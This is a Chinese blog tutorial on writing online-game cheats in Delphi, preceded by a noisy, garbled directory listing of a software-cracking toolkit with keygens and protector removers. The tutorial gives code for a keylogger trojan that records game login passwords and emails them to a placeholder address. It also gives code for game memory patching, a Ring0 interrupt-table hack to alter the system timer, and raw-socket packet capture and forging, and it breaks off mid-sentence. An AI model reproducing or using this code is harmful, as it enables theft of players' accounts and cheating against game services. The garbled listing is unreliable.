├─BorderPatch(L)Ps│ │ ├─hgraph1ic5Y│ │ ├─idb2sig`=│ │ ├─unispectorJ│ │ └─desquirrY│ ├─W32Dasm ;一款经典的反汇编工具，优点小巧实用，小程序可以用它分析A{i│ ├─Flower ;花指令去除器r5│ └─C32Asm ;p11621的作品，类似W32Dasm，其他字符串参考功能很强大@5ZPTr├─PACK ;加壳工具/│ ├─Protectors ;加密保护壳e"U;v│ │ ├─PE-Armor ;作者Hying，国内一款优秀的壳，一直不公开主程序，作者此次在大礼包公开了最新版0.765!oij%│ │ ├─ASProtect ;壳的老大，开创了壳的新时代，由于太出名，大家己研究很透，有价值的软件不推荐用其保护RXg~│ │ │ ├─ASProtect 2.3 SKEY6S│ │ │ ├─ASProtect 1.xxbp│ │ │ ├─KeyGenu^{` │ │ │ ├─ASProtect 2.2 SKEk[G1zU│ │ │ └─ASProtect 2.1>│ │ ├─Armadillo ;只有Custom才有完整的功能，很多商用软件采用其加壳，稳定性不错，由于太有名，容易被破解6GC│ │ ├─ACProtect ;国产壳，该壳变形做得好，强度还不错，但研究的多，己没多大强度F<&2J│ │ ├─VProtector ;国产壳，作者Vcasm，一款不错的保护壳，多线程运用的很熟练。 +<+;│ │ ├─PELock ;一款中等强度的壳，己长时间不更新"&│ │ ├─EXECryptor ;一款强度不错的猛壳，推荐，特别是其虚拟机保护功能Ju'│ │ ├─Themida ;一款优秀的商业保护壳，亮点就在它的虚拟机加密功能这块/~iUT│ │ │ ├─XBundler ;XBundler正版插件Dof+gk│ │ │ └─keygen ;Themida是用Winlicense保护的，这个keygen是shoooo制作的en<│ │ ├─Winlicense ;和Themida相比，WinLicense主要多了一个协议，两者核心保护是一样的r|,│ │ ├─VMProtect ;一款利用伪指令虚拟机的保护软件，保护代码。推荐使用！目前没见过反编译工具出现。9H│ │ ├─Telock ;但是它除了anti之外一无是处，己长时间不更新Es"=3│ │ ├─Obsidium ;一款优秀的壳，强度中等，它可以分块加密，对EXE重定位等。_0Yg]9│ │ ├─Xtreme-Protector ;这个可以说是目前最强悍的壳，也是驱动程序使用最为熟练的一个壳，但兼容性不好k9;p(q│ │ ├─SVK ;这个壳的有着深厚的背景,那就是anticracking.sknt_JD│ │ ├─Dbpe ;D.boy的幻影，很久没更新了。b"t│ │ ├─PB ;PB加密器1.0 免费版#│ │ ├─pespin ;PESpin是一个小巧易用的软件加密(加壳)工具，兼容性和稳定性不太好Xk│ │ ├─Private exe Protectorkx$$│ │ ├─Morphine5GN,f│ │ ├─Alex Protector*x3m│ │ ├─GHFProtectorYc│ │ ├─Enigma@_-#x│ │ ├─Yoda's Protector+:0E│ │ ├─MSLRHK&I│ │ ├─netshrinkM│ │ ├─EXE_StealthluY│ │ ├─Yoda's Crypter8zVJ│ │ ├─MoleBoxPro;)S│ │ ├─PUNiSHERer│ │ │ └─FoxLock{+i+[V│ │ ├─Stone's PE Cryptorde=│ │ ├─softSENTRYfCFvv│ │ ├─PE-ShieldG4b;p@│ │ ├─PELOCKnt3O%p│ │ ├─PowerShieldu│ │ ├─SDProtector8>│ │ ├─PCPEC7s[9│ │ ├─PCRYPT3wW./│ │ ├─PC_Guard3v│ │ ├─PE NINJAdLJ│ ├─StealthPE#&z│ ├─HidePEY=nyGX│ ├─PESpinQoCe│ ├─ACProtect#│ ├─fsg;&│ ├─ArmadillozXG8│ │ ├─Armadillo Sections Stripper2@9GS│ │ ├─armafpY1s)#D│ │ ├─Armadillo.Hardware.ID.PatcherF+M0│ │ ├─ArmInlineZ;Z,│ │ │ └─Source/(7hTf│ │ ├─DilloDumper.Y│ │ ├─dilloDIE8~<*/.│ │ ├─armadmpN/Rr│ │ └─armakg\│ ├─Safedisc<│ │ ├─Safedisc2Cleaner72h│ │ └─Unsafediscb│ ├─SetupaN%│ │ ├─UniExtract@W8M│ │ ├─WinUpackVc8│ │ └─Wise3│ ├─PE-Armori.zf3│ ├─PUNiSHER(F%I@│ ├─EncryptPE0/6r│ │ ├─EPE V2 Strippermn│ │ └─DeEPEJK~ra│ ├─yPu_J i+│ ├─SDProtectorzfba│ │ └─wsdpi*│ ├─Shrinker0M│ │ └─DeShrinkd>rB│ ├─UPXIaw:│ │ └─UPXFIX]D;│ ├─Vprotectorz4KHU9│ │ └─wvpjX&/│ ├─Orien2│ ├─PECompactY`LLPG│ ├─PetiteRr?{│ ├─KrytonP│ │ └─Krykiller}d│ ├─NsPackr%]h<(│ ├─fsguil6CR!?J│ └─AspackA/│ ├─ASPack_u:│ ├─AspackDieg(wE│ └─waspack4├─spy_tools ;监视工具p*%6G│ ├─Registry ;注册表监视工具SnC>y]│ ├─Filemon ;文件监视工具OCq│ ├─networkIxE~"?│ │ ├─wpe ;网络数据包监视工具，小巧好用72│ │ └─iris ;网络数据包监视工具y]│ ├─IceSword ;冰剑，查看隐藏进程_b@│ ├─ProcesslHc"│ │ ├─ProcessExplorer.|│ │ └─ProcessMonitor(>``│ ├─mfcspy.35│ │ └─src3o<│ ├─DebugView^@)│ ├─HideToolz_Z-4│ ├─APIU|│ │ └─SoftSnoop?LuQ│ └─Spy & Capure2i├─Compilers ;编译工具|N!h│ └─Delphi3│ └─DeDeT7/│ └─sourcestt├─Cryptography ;加密算法辅助工具0+C>s│ ├─RSA算法I│ │ ├─RSATool ;RSA算法辅助工具"wX&│ │ └─RsaKit ;afanty 的大数运算库，带源码\~qP,│ ├─DSA算法E│ │ └─DSAtool ;DSA算法辅助工具A│ │ ├─PPSIQS ;一款优秀的因式分解工具，速度比RSATool快的多，注意数字是10进制s0dr/│ │ ├─DLPTool ;离散对数计算器Y?│ │ ├─BigCalc ;StKman的大整数计算器1.0版Zcb│ │ ├─CryptoCalc ;多种加密算法计算器)1}│ │ ├─GF_calculator[Yu│ │ └─Calculatorr;r@Z│ ├─ElGamal算法f│ │ ├─ElGamal Keypair ;ElGamal Keys 生成器GH│ │ └─ElgamalGenerator@.QY│ ├─Hash函数t29_│ │ ├─HashCalcL 9│ │ ├─d#amn hash CalculatorRO#In│ │ ├─UltraCrackingMachine3Uc\│ │ ├─yyxzz-hash Calculator │ │ └─MD5Cracki,Rp~r│ ├─算法识别工具$│ │ ├─kanalEG.│ │ ├─CryptoSearcherqm`│ │ └─CC ;PEID工具己自带Q'`Hz│ └─MORSEw0C├─code ;代码计算辅助工具q[2%ZW│ ├─32bit CalculatoroJn?[Y│ ├─FloatConverthC?│ ├─Fpu Calculator)N│ ├─Jump Generatordx5jT│ └─Op-Code0├─dotnet ;.net相关工具 j|E#│ ├─Decompilers │ │ ├─Reflectorj/5auM│ │ └─xenocode`fB~8│ ├─DebugS:N?│ │ └─PEBrowseDbg}[e,│ ├─ProtectorsF<<0`(│ │ └─DNGRuardBZM^│ ├─otherb'"│ │ └─SnippetCompilerr\<>│ ├─StrongName@│ │ └─StrongNameRemove@O│ └─unProtector/ya│ └─injectReflectorf*"c2├─other ;其他一些工具c│ ├─Sdemo ;制作动画教学的工具r│ ├─变速齿轮 ;加速或减慢时间的工具，在调试时间限制的软件很有实用GA_x99│ ├─正则表达式T{%#│ ├─EnaleMenu ;将灰色按钮可用^│ ├─Enable.Net ;将灰钯按钮可用，适合.net程序"│ └─破文生成器k└─Document ;收集了一些常用文档OM'gISO MD5:AD920274ECCEF9F14A79B328054529332 H Screenshot: 光盘界面^, Download: BT种子U

Delphi深度之旅——网络游戏外挂制作

Thu, 5 Jul 2007 09:35:46 GMT

在几年前我看到别人玩网络游戏用上了外挂，做为程序员的我心里实在是不爽，想搞清楚这到底是怎么回事。就拿了一些来研究，小有心得，拿出来与大家共享，外挂无非就是分几种罢了（依制作难度）：1、动作式，所谓动作式，就是指用API发命令给窗口或API控制鼠标、键盘等，使游戏里的人物进行流动或者攻击，最早以前的“石器”外挂就是这种方式。2、本地修改式，这种外挂跟传统上的一些游戏修改器没有两样，做这种外挂在编程只需要对内存地址有一点认识并且掌握API就可以实现，“精灵”的外挂这是这种方式写成的，它的难点在于找到那些地址码，找地址一般地要借助于别人的工具，有的游戏还有双码校验，正正找起来会比较困难。3、木马式，这种外挂的目的是帮外挂制作者偷到用户的密码，做这种外挂有一定的难度，需要HOOK或键盘监视技术做底子，才可以完成，它的原理是先首截了用户的帐号或密码，然后发到指定邮箱。4、加速式，这种外挂可以加快游戏的速度。原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。5、封包式，这种外挂是高难度外挂，需要有很强的编程功力才可以写得出来。它的原理是先截取封包，后修改，再转发。这种外挂适用于大多数网络游戏，像WPE及一些网络游戏外挂都是用这种方式写成的，编写这种外挂需要apihook技术，winsock2技术…………　以下就用Delphi实现网络游戏外挂。 ===================================================================================上回对五种类型的外挂做了一个大体的概括，大家对这几种外挂都有了一定的了解，现在就依次（制作难度）由浅到深谈谈我对外挂制作的一些认识吧~~~~首先，先来谈一下动作式的外挂，这也是我第一次写外挂时做的最简单的一种。记得还在“石器”时代的时候，我看到别人挂着一种软件（外挂）人物就可以四外游走（当时我还不知道外挂怎么回事^_^），于是找了这种软件过来研究（拿来后才听别人说这叫外挂），发现这种东东其实实现起来并不难，仔佃看其实人物的行走无非就是鼠标在不同的地方点来点去而已，看后就有实现这功能的冲动，随后跑到MSDN上看了一些资料，发现这种实现这几个功能，只需要几个简单的API函数就可以搞定：1、首先我们要知道现在鼠标的位置（为了好还原现在鼠标的位置）所以我们就要用到API函数GetCursorPos，它的使用方法如下：BOOL GetCursorPos(LPPOINT lpPoint // address of structure for cursor position );2、我们把鼠标的位置移到要到人物走到的地方，我们就要用到SetCursorPos函数来移动鼠标位置，它的使用方法如下：BOOL SetCursorPos(int X, // horizontal position int Y // vertical position);3、模拟鼠标发出按下和放开的动作，我们要用到mouse_event函数来实现，具休使用方法用下：VOID mouse_event(DWORD dwFlags, // flags specifying various motion/click variantsDWORD dx, // horizontal mouse position or position changeDWORD dy, // vertical mouse position or position changeDWORD dwData, // amount of wheel movementDWORD dwExtraInfo // 32 bits of application-defined information);在它的dwFlags处，可用的事件很多如移动MOUSEEVENTF_MOVE，左键按下MOUSEEVENTF_LEFTDOWN，左键放开MOUSEEVENTF_LEFTUP，具体的东东还是查一下MSDN吧~~~~~好了，有了以前的知识，我们就可以来看看人物移走是怎么实现的了：getcursorpos(point);setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机坐标函数mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);setcursorpos(point.x,point.y);看了以上的代码，是不是觉得人物的游走很简单啦~~，举一仿三，还有好多好东东可以用这个技巧实现（我早就说过，TMD，这是垃圾外挂的做法，相信了吧~~~），接下来，再看看游戏里面自动攻击的做法吧（必需游戏中攻击支持快捷键的），道理还是一样的，只是用的API不同罢了~~~，这回我们要用到的是keybd_event函数，其用法如下：VOID keybd_event(BYTE bVk, // virtual-key codeBYTE bScan, // hardware scan codeDWORD dwFlags, // flags specifying various function optionsDWORD dwExtraInfo // additional data associated with keystroke);我们还要知道扫描码不可以直接使用，要用函数MapVirtualKey把键值转成扫描码，MapVirtualKey的具体使用方法如下：UINT MapVirtualKey(UINT uCode, // virtual-key code or scan codeUINT uMapType // translation to perform);好了，比说此快接键是CTRL+A，接下来让我们看看实际代码是怎么写的：keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0);keybd_event(65,mapvirtualkey(65,0),0,0);keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0);keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);首先模拟按下了CTRL键，再模拟按下A键，再模拟放开A键，最后放开CTRL键，这就是一个模拟按快捷键的周期。（看到这里，差不多对简易外挂有了一定的了解了吧~~~~做一个试试？如果你举一仿三还能有更好的东东出来，这就要看你的领悟能力了~~，不过不要高兴太早这只是才开始，以后还有更复杂的东东等着你呢~~） ===============================================================上回我们对动作式外挂做了一个解析，动作式是最简单的外挂，现在我们带来看看，比动作式外挂更进一步的外挂——本地修改式外挂的整个制作过程进行一个详细的分解。具我所知，本地修改式外挂最典型的应用就是在“精灵”游戏上面，因为我在近一年前（“精灵”还在测试阶段），我所在的公司里有很多同事玩“精灵”，于是我看了一下游戏的数据处理方式，发现它所发送到服务器上的信息是存在于内存当中（我看后第一个感受是：修改这种游戏和修改单机版的游戏没有多大分别，换句话说就是在他向服务器提交信息之前修改了内存地址就可以了），当时我找到了地址于是修改了内存地址，果然，按我的想法修改了地址，让系统自动提交后，果然成功了~~~~~，后来“精灵”又改成了双地址校检，内存校检等等，在这里我就不废话了~~~~，OK，我们就来看看这类外挂是如何制作的：在做外挂之前我们要对Windows的内存有个具体的认识，而在这里我们所指的内存是指系统的内存偏移量，也就是相对内存，而我们所要对其进行修改，那么我们要对几个Windows API进行了解，OK，跟着例子让我们看清楚这种外挂的制作和API的应用（为了保证网络游戏的正常运行，我就不把找内存地址的方法详细解说了）：1、首先我们要用FindWindow,知道游戏窗口的句柄，因为我们要通过它来得知游戏的运行后所在进程的ID，下面就是FindWindow的用法：HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name);2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID，函数用法如下：DWORD GetWindowThreadProcessId(HWND hWnd, // handle of windowLPDWORD lpdwProcessId // address of variable for process identifier);3、得到游戏进程ID后，接下来的事是要以最高权限打开进程，所用到的函数OpenProcess的具体使用方法如下：HANDLE OpenProcess(DWORD dwDesiredAccess, // access flag BOOL bInheritHandle, // handle inheritance flag DWORD dwProcessId // process identifier );在dwDesiredAccess之处就是设存取方式的地方，它可设的权限很多，我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以，其他的方式我们可以查一下MSDN。4、打开进程后，我们就可以用函数对存内进行操作，在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可（其他的操作方式比如说：ReadProcessMemory等，我在这里就不一一介绍了），我们看一下WriteProcessMemory的用法：BOOL WriteProcessMemory(HANDLE hProcess, // handle to process whose memory is written to LPVOID lpBaseAddress, // address to start writing to LPVOID lpBuffer, // pointer to buffer to write data toDWORD nSize, // number of bytes to writeLPDWORD lpNumberOfBytesWritten // actual number of bytes written );5、下面用CloseHandle关闭进程句柄就完成了。这就是这类游戏外挂的程序实现部份的方法，好了，有了此方法，我们就有了理性的认识，我们看看实际例子，提升一下我们的感性认识吧，下面就是XX游戏的外挂代码，我们照上面的方法对应去研究一下吧：constResourceOffset: dword = $004219F4;resource: dword = 3113226621;ResourceOffset1: dword = $004219F8;resource1: dword = 1940000000;ResourceOffset2: dword = $0043FA50;resource2: dword = 1280185;ResourceOffset3: dword = $0043FA54;resource3: dword = 3163064576;ResourceOffset4: dword = $0043FA58;resource4: dword = 2298478592;varhw: HWND;pid: dword;h: THandle;tt: Cardinal;beginhw := FindWindow(''XX'', nil);if hw = 0 thenExit;GetWindowThreadProcessId(hw, @pid);h := OpenProcess(PROCESS_ALL_ACCESS, false, pid);if h = 0 thenExit;if flatcheckbox1.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt);end;if flatcheckbox2.Checked=true thenbeginWriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt);end;MessageBeep(0);CloseHandle(h);close;这个游戏是用了多地址对所要提交的数据进行了校验，所以说这类游戏外挂制作并不是很难，最难的是要找到这些地址。 ================================================================以前介绍过的动作式，本地修改式外挂是真正意义上的外挂，而今天本文要介绍的木马式外挂，可能大多像木马吧，是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在，所以今天不得不说一下（我个人是非常讨厌这类外挂的，请看过本文的朋友不要到处乱用此技术，谢谢合作）。要做此类外挂的程序实现方法很多（比如HOOK，键盘监视等技术），因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库，所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视，这个程序用这种技术来实现比较适合。在做程序之前我们必需要了解一下程序的思路：1、我们首先知道你想记录游戏的登录窗口名称。2、判断登录窗口是否出现。3、如果登录窗口出现，就记录键盘。4、当窗口关闭时，把记录信息，通过邮件发送到程序设计者的邮箱。第一点我就不具体分析了，因为你们比我还要了解你们玩的是什么游戏，登录窗口名称是什么。从第二点开始，我们就开始这类外挂的程序实现之旅：那么我们要怎么样判断登录窗口虽否出现呢？其实这个很简单，我们用FindWindow函数就可以很轻松的实现了：HWND FindWindow(LPCTSTR lpClassName, // pointer to class nameLPCTSTR lpWindowName // pointer to window name);实际程序实现中，我们要找到''xx''窗口，就用FindWindow(nil,''xx'')如果当返回值大于0时表示窗口已经出现，那么我们就可以对键盘信息进行记录了。先首我们用SetWindowsHookEx设置监视日志，而该函数的用法如下：HHOOK SetWindowsHookEx(int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of thread to install hook for ); 在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数，来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了，具体实现方法为：hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0); 而HOOKPROC里的函数就要复杂一点点：function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; begin if findedtitle then //如果发现窗口后begin if (peventmsg(lparam)^.message = WM_KEYDOWN) then //消息等于键盘按下hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通过keyhookresult（自定义的函数，主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的）转换消息。if length(hookkey) > 0 then //如果获得按键名称begin Write(hookkeyFile,hookkey); //把按键名称写入文本文件hookkey := ''''; end; end; end; 以上就是记录键盘的整个过程，简单吧，如果记录完可不要忘记释放呀，UnHookWindowsHookEx(hHook)，而hHOOK,就是创建setwindowshookex后所返回的句柄。我们已经得到了键盘的记录，那么现在最后只要把记录的这些信息发送回来，我们就大功造成了。其他发送这块并不是很难，只要把记录从文本文件里边读出来，用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下：assignfile(ReadFile,''hook.txt''); //打开hook.txt这个文本文件reset(ReadFile); //设为读取方式try While not Eof(ReadFile) do //当没有读到文件尾begin Readln(ReadFile,s,j); //读取文件行body:=body+s; end; finally closefile(ReadFile); //关闭文件end; nmsmtp1.EncodeType:=uuMime; //设置编码nmsmtp1.PostMessage.Attachments.Text:=''''; //设置附件nmsmtp1.PostMessage.FromAddress:=''XXX@XXX.com''; //设置源邮件地址nmsmtp1.PostMessage.ToAddress.Text:=''XXX@XXX.com''; /设置目标邮件地址nmsmtp1.PostMessage.Body.Text:=''密码''+'' ''+body; //设置邮件内容nmsmtp1.PostMessage.Subject:=''password''; //设置邮件标题nmsmtp1.SendMail; //发送邮件 ==================================================================================我一直没有搞懂制作加速外挂是怎么一回事，直到前不久又翻出来了2001年下半期的《程序员合订本》中《“变速齿轮”研究手记》重新回味了一遍，才有了一点点开悟，随后用Delphi重写了一遍，下面我就把我的心得说给大家听听，并且在此感谢《“变速齿轮”研究手记》作者褚瑞大虲给了提示。废话我就不多说了，那就开始神奇的加速型外挂体验之旅吧！原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。以前DOS时代玩过编程的人就会马上想到，这很简单嘛不就是直接修改一下8253寄存器嘛，这在以前DOS时代可能可以行得通，但是windows则不然。windows是一个32位的操作系统，并不是你想改哪就改哪的（微软的东东就是如此霸气，说不给你改就不给你改^_^），但要改也不是不可能，我们可以通过两种方法来实现：第一是写一个硬件驱动来完成，第二是用Ring0来实现（这种方法是CIH的作者陈盈豪首用的，它的原理是修改一下IDT表->创建一个中断门->进入Ring0->调用中断修改向量，但是没有办法只能用ASM汇编来实现这一切*_*，做为高级语言使用者惨啦！），用第一种方法用点麻烦，所以我们在这里就用第二种方法实现吧~~~在实现之前我们来理一下思路吧：1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门，修改向量等工作2、调用这个过程来实现加速功能好了，现在思路有了，我们就边看代码边讲解吧：首先我们建立一个过程，这个过程就是本程序的核心部份：procedure SetRing(value:word); stdcall; const ZDH = $03; ／／设一个中断号varIDT : array [0..5] of byte; ／／保存IDT表OG : dword; ／／存放旧向量beginasmpush ebxsidt IDT ／／读入中断描述符表mov ebx, dword ptr [IDT+2] ／／IDT表基地址add ebx, 8*ZDH ／／计算中断在中断描述符表中的位置cli ／／关中断mov dx, word ptr [ebx+6] shl edx, 16d mov dx, word ptr [ebx] mov [OG], edx mov eax, offset @@Ring0 ／／指向Ring0级代码段mov word ptr [ebx], ax ／／低16位,保存在1,2位shr eax, 16dmov word ptr [ebx+6], ax ／／高16位，保存在6,7位int ZDH ／／中断mov ebx, dword ptr [IDT+2] ／／重新定位add ebx, 8*ZDHmov edx, [OG]mov word ptr [ebx], dxshr edx, 16dmov word ptr [ebx+6], dx ／／恢复被改了的向量pop ebxjmp @@exitasm ／／到exitasm处@@Ring0: ／／Ring0,这个也是最最最核心的东东mov al,$34 ／／写入8253控制寄存器out $43,almov ax,value　／／写入定时值out $40,al ／／写定时值低位mov al,ahout $40,al ／／写定时值高位iretd ／／返回@@exitasm:end;end;最核心的东西已经写完了，大部份读者是知其然不知其所以然吧，呵呵，不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于“变速齿轮”的一个东东吧！先加一个窗口，在窗口上放上一个trackbar控件把其Max设为20，Min设为1，把Position设为10，在这个控件的Change事件里写上：SetRing(strtoint(''$''+inttostr(1742+(10-trackbar1.Position)*160)));因为windows默认的值为$1742，所以我们把1742做为基数，又因为值越小越快，反之越慢的原理，所以写了这样一个公式，好了，这就是“变速齿轮”的一个Delphi＋ASM版了（只适用于win9X），呵呵，试一下吧，这对你帮助会很大的，呵呵。在win2000里，我们不可能实现在直接对端口进行操作，Ring0也失了效，有的人就会想到，我们可以写驱动程序来完成呀，但在这里我告诉你，windows2000的驱动不是一个VxD就能实现的，像我这样的低手是写不出windows所用的驱动WDM的，没办法，我只有借助外力实现了，ProtTalk就是一个很好的设备驱动，他很方便的来实现对低层端口的操作，从而实现加速外挂。1、我们首先要下一个PortTalk驱动，他的官方网站是http://www.beyondlogic.org2、我们要把里面的prottalk.sys拷贝出来。3、建立一个Protalk.sys的接口（我想省略了，大家可以上http://www.freewebs.com/liuyue/porttalk.pas下个pas文件自己看吧）4、实现加速外挂。本来就篇就是补充篇原理我也不想讲太多了，下面就讲一下这程序的实现方法吧，如果说用ProtTalk来操作端口就容易多了，比win98下用ring权限操作方便。1、新建一个工程，把刚刚下的接口文件和Protalk.sys一起拷到工程文件保存的文件夹下。2、我们在我们新建的工程加入我们的接口文件useswindows,ProtTalk……3、我们建立一个过程procedure SetRing(value:word); beginif not OpenPortTalk then exit;outportb($43,$34);outportb($40,lo(Value));outprotb($40,hi(value));ClosePortTalk;end;4、先加一个窗口，在窗口上放上一个trackbar控件把其Max设为20，Min设为1，把Position设为10，在这个控件的Change事件里写上：SetRing(strtoint(''$''+inttostr(1742+(10-trackbar1.Position)*160))); ============================================================================网络游戏的封包技术是大多数编程爱好者都比较关注的关注的问题之一，在这一篇里就让我们一起研究一下这一个问题吧。别看这是封包这一问题，但是涉及的技术范围很广范，实现的方式也很多（比如说APIHOOK,VXD,Winsock2都可以实现），在这里我们不可能每种技术和方法都涉及，所以我在这里以Winsock2技术作详细讲解，就算作抛砖引玉。由于大多数读者对封包类编程不是很了解，我在这里就简单介绍一下相关知识：APIHooK：由于Windows的把内核提供的功能都封装到API里面，所以大家要实现功能就必须通过API，换句话说就是我们要想捕获数据封包，就必须先要得知道并且捕获这个API，从API里面得到封包信息。VXD：直接通过控制VXD驱动程序来实现封包信息的捕获，不过VXD只能用于win9X。winsock2：winsock是Windows网络编程接口，winsock工作在应用层，它提供与底层传输协议无关的高层数据传输编程接口，winsock2是winsock2.0提供的服务提供者接口，但只能在win2000下用。好了，我们开始进入winsock2封包式编程吧。在封包编程里面我准备分两个步骤对大家进行讲解：1、封包的捕获，2、封包的发送。首先我们要实现的是封包的捕获：Delphi的封装的winsock是1.0版的，很自然winsock2就用不成。如果要使用winsock2我们要对winsock2在Delphi里面做一个接口，才可以使用winsock2。1、如何做winsock2的接口？1）我们要先定义winsock2.0所用得到的类型，在这里我们以WSA_DATA类型做示范，大家可以举一仿三的来实现winsock2其他类型的封装。我们要知道WSA_DATA类型会被用于WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer;，大家会发现WSData是引用参数，在传入参数时传的是变量的地址，所以我们对WSA_DATA做以下封装：const WSADESCRIPTION_LEN = 256; WSASYS_STATUS_LEN = 128; type PWSA_DATA = ^TWSA_DATA; WSA_DATA = record wVersion: Word; wHighVersion: Word; szDescription: array[0..WSADESCRIPTION_LEN] of Char; szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char; iMaxSockets: Word; iMaxUdpDg: Word; lpVendorInfo: PChar; end; TWSA_DATA = WSA_DATA; 2）我们要从WS2_32.DLL引入winsock2的函数，在此我们也是以WSAStartup为例做函数引入：function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall;implementation const WinSocket2 = ''WS2_32.DLL''; function WSAStartup; external winsocket name ''WSAStartup''; 通过以上方法，我们便可以对winsock2做接口，下面我们就可以用winsock2做封包捕获了，不过首先要有一块网卡。因为涉及到正在运作的网络游戏安全问题，所以我们在这里以IP数据包为例做封包捕获，如果下面的某些数据类型您不是很清楚，请您查阅MSDN：1）我们要起动WSA，这时个要用到的WSAStartup函数，用法如下：INTEGER WSAStartup(wVersionRequired: word，WSData: TWSA_DATA)；2）使用socket函数得到socket句柄，m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP); 用法如下：INTEGER socket(af: Integer, Struct: Integer, protocol: Integer); m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP);在程序里m_hSocket为socket句柄，AF_INET，SOCK_RAW，IPPROTO_IP均为常量。3)定义SOCK_ADDR类型，跟据我们的网卡IP给Sock_ADDR类型附值，然后我们使用bind函数来绑定我们的网卡，Bind函数用法如下：Type IN_ADDR = record S_addr : PChar;End;Type TSOCK_ADDR = record sin_family: Word;sin_port: Word;sin_addr : IN_ADDRsin_zero: array[0..7] of Char; End;varLocalAddr:TSOCK_ADDR;LocalAddr.sin_family: = AF_INET;LocalAddr.sin_port: = 0;LocalAddr.sin_addr.S_addr: = inet_addr(''192.168.1.1''); ／／这里你自己的网卡的IP地址,而inet_addr这个函数是winsock2的函数。bind(m_hSocket, LocalAddr, sizeof(LocalAddr))；4)用WSAIoctl来注册WSA的输入输出组件，其用法如下：INTEGER WSAIoctl(s:INTEGER, dwIoControlCode : INTEGER, lpvInBuffer :INTEGER,cbInBuffer : INTEGER, lpvOutBuffer : INTEGER,cbOutBuffer: INTEGER, lpcbBytesReturned : INTEGER, lpOverlapped : INTEGER, lpCompletionRoutine : INTEGER);5)下面做死循环，在死循环块里，来实现数据的接收。但是徇环中间要用Sleep()做延时，不然程序会出错。6)在循环块里，用recv函数来接收数据，recv函数用法如下：INTEGER recv (s : INTEGER, buffer:Array[0..4095] of byte, length : INTEGER,flags : INTEGER,)；7)在buffer里就是我们接收回来的数据了，如果我们想要知道数据是什么地方发来的，那么，我们要定义一定IP包结构，用CopyMemory()把IP信息从buffer里面读出来就可以了，不过读出来的是十六进制的数据需要转换一下。看了封包捕获的全过程序，对你是不是有点起发，然而在这里要告诉大家的是封包的获得是很容易的，但是许多游戏的封包都是加密的，如果你想搞清楚所得到的是什么内容还需要自己进行封包解密。 ======================================================================在本章中，我们主要来研究一下封包的制作和发送，同样，我们所采用的方法是Delphi+winsock2来制作。在以前说过在Delphi中只封装了winsock1，winsock2需要自已封装一下，我在此就不多介绍如何封装了。下面就一步步实现我们的封包封装与发送吧：首先，我们应该知道，封包是分两段的，一段是IP，一段是协议（TCP，UDP，其他协议），IP就像邮政编码一样，标识着你的这个封包是从哪里到哪里，而协议里记录着目标所要用到的包的格式及校验等，在网络游戏中的协议一般都是自已定义的，要破解网络游戏最重要的是学会破解网络游戏的协议网络游戏协议破解，为了不影响现运行的网络游戏的安全，我在此会以UDP协议为例，介绍一下网络协议的封包与发送的全过程。接下来，我们就可以开始看看整个封包全过程了：1）我们要起动sock2，这时个要用到的WSAStartup函数，用法如下：INTEGER WSAStartup(wVersionRequired: word，WSData: TWSA_DATA)；在程序中wVersionRequired我们传入的值为$0002,WSData为TWSA_DATA的结构。2）使用socket函数创建并得到socket句柄; 用法如下：INTEGER socket(af: Integer, Struct: Integer, protocol: Integer); 注意的是在我们的程序封包中饱含了IP包头，所以我们的Struct参数这里要传入的参数值为2，表示包含了包头。该函数返回值为刚刚创建的winsocket的句柄。3）使用setsockopt函数设置sock的选项; 用法如下：INTEGER setsockopt(s: Integer,level: Integer, optname: Integer,optval: PChar,optlen: Integer); 在S处传入的是Socket句柄，在本程序里level输入的值为0表示IP（如果是6表示TCP，17表示UDP等~），OptName里写入2，而optval的初始值填入1，optlen为optval的大小。4）接下来我们要分几个步骤来实现构建封包：1、把IP转换成sock地址，用inet_addr来转换。Longint inet_addr(cp: 